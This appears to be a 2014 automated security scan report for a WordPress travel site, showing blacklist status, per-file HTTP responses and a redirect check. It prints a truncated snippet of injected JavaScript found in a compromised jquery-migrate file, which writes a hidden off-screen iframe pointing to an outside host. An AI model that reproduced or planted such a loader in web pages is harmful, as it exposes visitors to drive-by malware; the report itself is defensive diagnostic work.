Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tobaccoroadtravel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tobaccoroadtravel.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Tue, 16 Sep 2014 15:03:18 GMT Pragma: no-cache Location: http://tobaccoroadtravel.com/ Server: Microsoft-IIS/7.5 Content-Length: 152 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=68idfh4niahpn9ve83gnjk6bs1; path=/ X-Pingback: http://tobaccoroadtravel.com/xmlrpc.php X-Powered-By: PHP/5.3.27 X-Powered-By: ASP.NET | clean |
http://tobaccoroadtravel.com/ | 200 OK Content-Length: 59778 Content-Type: text/html | clean |
http://tobaccoroadtravel.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96869 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8262 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}
function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.glencoevillabnb.com/ifituterasie16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%
Antivirus reports:
http://tobaccoroadtravel.com/wp-content/plugins/images-thumbnail-sliderv1/js/jc.js?ver=4.0 | 200 OK Content-Length: 15691 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/js/jquery.cycle.all.min.js | 200 OK Content-Length: 34844 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/js/jquery.easing.1.3.js | 200 OK Content-Length: 9159 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/js/superfish.js | 200 OK Content-Length: 4776 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 1819 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/themes/ElegantEstate/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/CTF_kodda_menu/core/../standard/js/frontend.min.js?ver=1.2.3 | 200 OK Content-Length: 36195 Content-Type: application/x-javascript | clean |
http://www.tobaccoroadtravel.com/quote-your-trip | 200 OK Content-Length: 43239 Content-Type: text/html | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=4.0 | 200 OK Content-Length: 33 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=4.0 | 200 OK Content-Length: 24995 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=4.0 | 200 OK Content-Length: 5337 Content-Type: application/x-javascript | clean |
http://tobaccoroadtravel.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=4.0 | 200 OK Content-Length: 891 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tobaccoroadtravel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 16 Sep 2014 15:03:18 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Content-Length: 59778
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://tobaccoroadtravel.com/>; rel=shortlink
Set-Cookie: PHPSESSID=t9i5tcbti5uj6j066n8a1559s0; path=/
X-Pingback: http://tobaccoroadtravel.com/xmlrpc.php
X-Powered-By: PHP/5.3.27
X-Powered-By: ASP.NET
...59778 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tobaccoroadtravel.com
Referer: http://www.google.com/search?q=tobaccoroadtravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.